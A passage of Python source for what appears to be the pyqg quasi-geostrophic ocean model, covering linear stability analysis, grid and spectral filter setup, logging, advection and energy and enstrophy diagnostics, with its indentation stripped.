1j \delta_{N N} r_{ek} I \kappa^2
where :math:`\delta_{N N} = [0,0,\dots,0,1] ,`
and
.. math:: B = S - I \kappa^2 .
The eigenstructure is
.. math:: \Phi
and the eigenvalue is
.. math:: `\omega`
The growth rate is Im\ :math:`\{\omega\}`.
Parameters
----------
bottom_friction: optional inclusion linear bottom drag
in the linear stability calculation
(default is False, as if :math: `r_{ek} = 0`)
Returns
-------
omega: complex array
The eigenvalues with largest complex part (units: inverse model time)
phi: complex array
The eigenvectors associated associated with \omega (unitless)
"""
omega = np.zeros_like(self.wv)+0.j
phi = np.zeros_like(self.qh)
I = np.eye(self.nz)
L2 = self.S[:,:,np.newaxis,np.newaxis] - self.wv2*I[:,:,np.newaxis,np.newaxis]
Q = I[:,:,np.newaxis,np.newaxis]*(self.ikQy - self.ilQx).imag
Uk =(self.Ubg*I)[:,:,np.newaxis,np.newaxis]*self.k
Vl =(self.Vbg*I)[:,:,np.newaxis,np.newaxis]*self.l
L3 = np.einsum('ij...,jk...->ik...',L2,Uk+Vl) + 0j
if bottom_friction:
L3[-1,-1,:,:] += 1j*self.rek*self.wv2
L4 = self.a.T
M = np.einsum('...ij,...jk->...ik',L4,(L3+Q).T)
evals,evecs = np.linalg.eig(M)
evals, evecs = evals.T, evecs.T
# sorting things this way proved way
# more faster than using numpy's argsort() !
imax = evals.imag.argmax(axis=0)
for i in range(self.nl):
for j in range(self.nk):
omega[i,j] = evals[imax[i,j],i,j]
phi[:,i,j] = evecs[imax[i,j],:,i,j]
return omega, phi
def subgrid_forcing(self, **kwargs):
raise ValueError(
"This method was found to be buggy and removed for now. "
"It will be re-added in a future release. "
"See https://github.com/pyqg/pyqg/pull/308 for details. "
)
### PRIVATE METHODS - not meant to be called by user ###
def _step_forward(self):
self._invert()
# find streamfunction from pv
self._do_advection()
# use streamfunction to calculate advection tendency
self._do_friction()
# apply friction
self._do_external_forcing()
# apply external forcing
if self.uv_parameterization is not None:
self._do_uv_subgrid_parameterization()
# apply velocity subgrid forcing term, if present
if self.q_parameterization is not None:
self._do_q_subgrid_parameterization()
# apply potential vorticity subgrid forcing term, if present
self._calc_diagnostics()
# do what has to be done with diagnostics
self._forward_timestep()
# apply tendencies to step the model forward
# (filter gets called here)
# the basic steps are
self._print_status()
def _initialize_time(self):
"""Set up timestep stuff"""
#self.t=0 # actual time
#self.tc=0 # timestep number
self.taveints = np.ceil(self.taveint/self.dt)
### initialization routines, only called once at the beginning ###
# TODO: clean up and simplify this whole routine
def _initialize_grid(self):
"""Set up spatial and spectral grids and related constants"""
self.x,self.y = np.meshgrid(
np.arange(0.5,self.nx,1.)/self.nx*self.L,
np.arange(0.5,self.ny,1.)/self.ny*self.W )
# Notice: at xi=1 U=beta*rd^2 = c for xi>1 => U>c
# wavenumber one (equals to dkx/dky)
self.dk = 2.*pi/self.L
self.dl = 2.*pi/self.W
# wavenumber grids
# set in kernel
#self.nl = self.ny
#self.nk = int(self.nx/2+1)
self.ll = self.dl*np.append( np.arange(0.,self.nx/2),
np.arange(-self.nx/2,0.) )
self.kk = self.dk*np.arange(0.,self.nk)
self.k, self.l = np.meshgrid(self.kk, self.ll)
self.ik = 1j*self.k
self.il = 1j*self.l
# physical grid spacing
self.dx = self.L / self.nx
self.dy = self.W / self.ny
# constant for spectral normalizations
self.M = self.nx*self.ny
# isotropic wavenumber^2 grid
# the inversion is not defined at kappa = 0
self.wv2 = self.k**2 + self.l**2
self.wv = np.sqrt( self.wv2 )
iwv2 = self.wv2 != 0.
self.wv2i = np.zeros_like(self.wv2)
self.wv2i[iwv2] = self.wv2[iwv2]**-1
def _initialize_background(self):
raise NotImplementedError(
'needs to be implemented by Model subclass')
def _initialize_inversion_matrix(self):
raise NotImplementedError(
'needs to be implemented by Model subclass')
def _initialize_forcing(self):
raise NotImplementedError(
'needs to be implemented by Model subclass')
def _initialize_filter(self):
"""Set up frictional filter."""
# this defines the spectral filter (following Arbic and Flierl, 2003)
cphi=0.65*pi
wvx=np.sqrt((self.k*self.dx)**2.+(self.l*self.dy)**2.)
filtr = np.exp(-self.filterfac*(wvx-cphi)**4.)
filtr[wvx<=cphi] = 1.
self.filtr = filtr
def _filter(self, q):
return self.filtr * q
def _do_external_forcing(self):
pass
# logger
def _initialize_logger(self):
self.logger = logging.getLogger(__name__)
if not (self.logfile is None):
fhandler = logging.FileHandler(filename=self.logfile, mode='w')
else:
fhandler = logging.StreamHandler()
formatter = logging.Formatter('%(levelname)s: %(message)s')
fhandler.setFormatter(formatter)
if not self.logger.handlers:
self.logger.addHandler(fhandler)
self.logger.setLevel(self.log_level*10)
# this prevents the logger to propagate into the ipython notebook log
self.logger.propagate = False
self.logger.info(' Logger initialized')
# compute advection in grid space (returns qdot in fourier space)
# *** don't remove! needed for diagnostics (but not forward model) ***
def _advect(self, q, u=None, v=None):
"""Given real inputs q, u, v, returns the advective tendency for
q in spectral space."""
if u is None:
u = self.u
if v is None:
v = self.v
uq = u*q
vq = v*q
# this is a hack, since fft now requires input to have shape (nz,ny,nx)
# it does an extra unnecessary fft
is_2d = (uq.ndim==2)
if is_2d:
uq = np.tile(uq[np.newaxis,:,:], (self.nz,1,1))
vq = np.tile(vq[np.newaxis,:,:], (self.nz,1,1))
tend = self.ik*self.fft(uq) + self.il*self.fft(vq)
if is_2d:
return tend[0]
else:
return tend
# def _filter(self, q):
# """Apply filter to field q."""
# return q
def _print_status(self):
"""Output some basic stats."""
if (self.log_level) and ((self.tc % self.twrite)==0):
self.ke = self._calc_ke()
self.cfl = self._calc_cfl()
#print 't=%16d, tc=%10d: cfl=%5.6f, ke=%9.9f' % (
# self.t, self.tc, cfl, ke)
self.logger.info('Step: %i, Time: %3.2e, KE: %3.2e, CFL: %4.3f'
, self.tc,self.t,self.ke,self.cfl )
assert self.cfl<1., self.logger.error('CFL condition violated')
def _calc_diagnostics(self):
# here is where we calculate diagnostics
if (self.t>=self.dt) and (self.t>=self.tavestart) and (self.tc%self.taveints==0):
self._increment_diagnostics()
# def _forward_timestep(self):
# """Step forward based on tendencies"""
#
# #self.dqhdt = self.dqhdt_adv + self.dqhdt_forc
#
# # Note that Adams-Bashforth is not self-starting
# if self.tc==0:
# # forward Euler at the first step
# qtend = tendency_forward_euler(self.dt, self.dqhdt)
# elif (self.tc==1) or (self.useAB2):
# # AB2 at step 2
# qtend = tendency_ab2(self.dt, self.dqhdt, self.dqhdt_p)
# else:
# # AB3 from step 3 on
# qtend = tendency_ab3(self.dt, self.dqhdt,
# self.dqhdt_p, self.dqhdt_pp)
#
# # add tendency and filter
# self.set_qh(self._filter(self.qh + qtend))
#
# # remember previous tendencies
# self.dqhdt_pp[:] = self.dqhdt_p.copy()
# self.dqhdt_p[:] = self.dqhdt.copy()
# #self.dqhdt[:] = 0.
#
# # augment timestep and current time
# self.tc += 1
# self.t += self.dt
### All the diagnostic stuff follows. ###
def _calc_cfl(self):
raise NotImplementedError(
'needs to be implemented by Model subclass')
# this is stuff the Cesar added
# if self.tc==0:
# assert self.calc_cfl()<1., " *** time-step too large "
# # initialize ke and time arrays
# self.ke = np.array([self.calc_ke()])
# self.eddy_time = np.array([self.calc_eddy_time()])
# self.time = np.array([0.])
def _calc_ke(self):
raise NotImplementedError(
'needs to be implemented by Model subclass')
def _initialize_diagnostics(self, diagnostics_list):
# Initialization for diagnotics
self.diagnostics = dict()
self._initialize_core_diagnostics()
self._initialize_model_diagnostics()
if diagnostics_list == 'all':
pass # by default, all diagnostics are active
elif diagnostics_list == 'none':
self.set_active_diagnostics([])
else:
self.set_active_diagnostics(diagnostics_list)
def _initialize_core_diagnostics(self):
"""Diagnostics common to all models."""
self.add_diagnostic('Ensspec',
description='enstrophy spectrum',
function= (lambda self: np.abs(self.qh)**2/self.M**2),
units='s^-2',
dims=('lev','l','k')
)
self.add_diagnostic('KEspec',
description='kinetic energy spectrum',
function= (lambda self: self.wv2*np.abs(self.ph)**2/self.M**2),
units='m^2 s^-2',
dims=('lev','l','k')
) # factor of 2 to account for the fact that we have only half of
# the Fourier coefficients.
self.add_diagnostic('EKEdiss',
description='total energy dissipation by bottom drag',
function= (lambda self: self.Hi[-1]/self.H*self.rek*(self.v[-1]**2 + self.u[-1]**2).mean()),
units='m^2 s^-3',
dims=('time',)
)
self.add_diagnostic('KEfrictionspec',
description='total energy dissipation spectrum by bottom drag',
function= (lambda self: -self.rek*self.Hi[-1]/self.H*self.wv2*np.abs(self.ph[-1])**2/self.M**2),
units='m^2 s^-3',
dims=('l','k')
)
self.add_diagnostic('EKE',
description='mean eddy kinetic energy',
function= (lambda self: 0.5*(self.v**2 + self.u**2).mean(axis=-1).mean(axis=-1)),
units='m^2 s^-2',
dims=('lev',)
)
def dissipation_spectrum(m):
spectrum = np.zeros_like(m.qh)
ones = np.ones_like(m.filtr)
if m.ablevel==0:
# forward euler
dt1 = m.dt
dt2 = 0.0
dt3 = 0.0
elif m.ablevel==1:
# AB2 at step 2
dt1 = 1.5*m.dt
dt2 = -0.5*m.dt
dt3 = 0.0
else:
# AB3 from step 3 on
dt1 = 23./12.*m.dt
dt2 = -16./12.*m.dt
dt3 = 5./12.*m.dt
for k in range(m.nz):
spectrum[k] = (m.filtr - ones) * (
m.qh[k] + dt1*m.dqhdt[k] + dt2*m.dqhdt_p[k] + dt3*m.dqhdt_pp[k])
return spectrum
self.add_diagnostic('Dissspec',
description='Spectral contribution of filter dissipation to total energy',
function=(lambda self: -np.tensordot(self.Hi,
np.conj(self.ph)*dissipation_spectrum(self), axes=(0, 0)).real/self.H/self.dt/self.M**2),
units='m^2 s^-3',
dims=('l','k')
)
self.add_diagnostic('ENSDissspec',
description='Spectral contribution of filter dissipation to barotropic enstrophy',
function=(lambda self: np.tensordot(self.Hi,
np.conj(self.qh)*dissipation_spectrum(self), axes=(0, 0)).real/self.H/self.dt/self.M**2),
units='s^-3',
dims=('l','k')
)
self.add_diagnostic('paramspec',
description='Spectral contribution of subgrid parameterization to energy (if present)',
function=lambda self: self._calc_parameterization_spectrum(),
units='m^2 s^-3',
dims=('l','k'),
skip_comparison=True,
)
self.add_diagnostic('ENSparamspec',
description='Spectral contribution of subgrid parameterization to enstrophy',
function=lambda self: self._calc_parameterization_enstrophy_spectrum(),
units='s^-3',
dims=('l','k'),
skip_comparison=True,
)
def _calc_parameterization_contribution(self):
dqh = np.zeros_like(self.qh)
if self.uv_parameterization is not None:
ik = np.asarray(self._ik).reshape((1, -1)).repeat(self.wv2.shape[0], axis=0)
il = np.asarray(self._il).reshape((-1, 1)).repeat(self.wv2.shape[-1], axis=-1)
dqh += -il * self.duh + ik * self.dvh
if self.q_parameterization is not None:
dqh += self.dqh
return dqh
def _calc_parameterization_spectrum(self):
dqh = self._calc_parameterization_contribution()
height_ratios = (self.Hi / self.H)[:,np.newaxis,np.newaxis]
return -np.real((height_ratios * np.conj(self.ph) * dqh).sum(axis=0)) / self.M**2
def _calc_parameterization_enstrophy_spectrum(self):
dqh = self._calc_parameterization_contribution()
height_ratios = (self.Hi / self.H)[:,np.newaxis,np.newaxis]
return np.real((height_ratios * np.conj(self.qh) * dqh).sum(axis=0)) / self.M**2
def _calc_derived_fields(self):
"""Should be implemented by subclass."""
pass
def _initialize_model_diagnostics(self):
"""Should be implemented by subclass."""
pass
def _set_active_diagnostics(self, diagnostics_list):
for d in self.diagnostics:
self.diagnostics[d]['active'] == (d in diagnostics_list)
def add_diagnostic(self, diag_name, description=None, function=None, units=None, dims=None, **kw):
# create a new diagnostic dict and add it to the object array
# make sure the function is callable
assert hasattr(function, '__call__')
# make sure the name is valid
assert isinstance(diag_name, str)
# by default, diagnostic is active
self.diagnostics[diag_name] = {
'description': description,
'units': units,
'dims': dims,
'active': True,
'count': 0,
'function': function, }
# add any additional properties
self.diagnostics[diag_name].update(**kw)
def describe_diagnostics(self):
"""Print a human-readable summary of the available diagnostics."""
diag_names = list(self.diagnostics.keys())
diag_names.sort()
print('NAME | DESCRIPTION')
print(80*'-')
for k in diag_names:
d = self.diagnostics[k]
print('{:<10} | {:<54}'.format(
*(k, d['description'])))
def _increment_diagnostics(self):
# compute intermediate quantities needed for some diagnostics
self._calc_derived_fields()
for dname in self.diagnostics:
if self.diagnostics[dname]['active']:
res = self.diagnostics[dname]['function'](self)
if self.diagnostics[dname]['count']==0:
self.diagnostics[dname]['value'] = res
else:
self.diagnostics[dname]['value'] += res
self.diagnostics[dname]['count'] += 1
def get_diagnostic(self, dname):
if 'value' not in self.diagnostics[dname]:
raise DiagnosticNotFilledError(dname)
return (self.diagnostics[dname]['value'] /
self.diagnostics[dname]['count'])
def spec_var(self, ph):
""" compute variance of p from Fourier coefficients ph """
var_dens = 2. * np.abs(ph)**2 / self.M**2
# only half of coefs [0] and [nx/2+1] due to symmetry in real fft2
var_dens[...,0] = var_dens[...,0]/2.
var_dens[...,-1] = var_dens[...,-1]/2.
return var_dens.sum()
def set_qh(self, qh):
warnings.warn("Method deprecated. Set model.qh directly instead. ",
DeprecationWarning)
self.qh = qh
def set_q(self, q):
warnings.warn("Method deprecated. Set model.q directly instead. ",
DeprecationWarning)
self.q = q
def to_dataset(self):
"""Convert outputs from model to an xarray dataset
Returns
-------
ds : xarray.Dataset
"""
from .xarray_output import model_to_dataset
return model_to_dataset(self)
@property
def parameterization(self):
"""Return the model's parameterization if present (either in terms of
PV or velocity, warning if there are both).
Returns
-------
parameterization : pyqg.Parameterization or function
"""
if self.q_parameterization and self.uv_parameterization:
warnings.warn("Model has multiple parameterizations, "\
"but only returning PV")
return self.q_parameterization or self.uv_parameterization
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.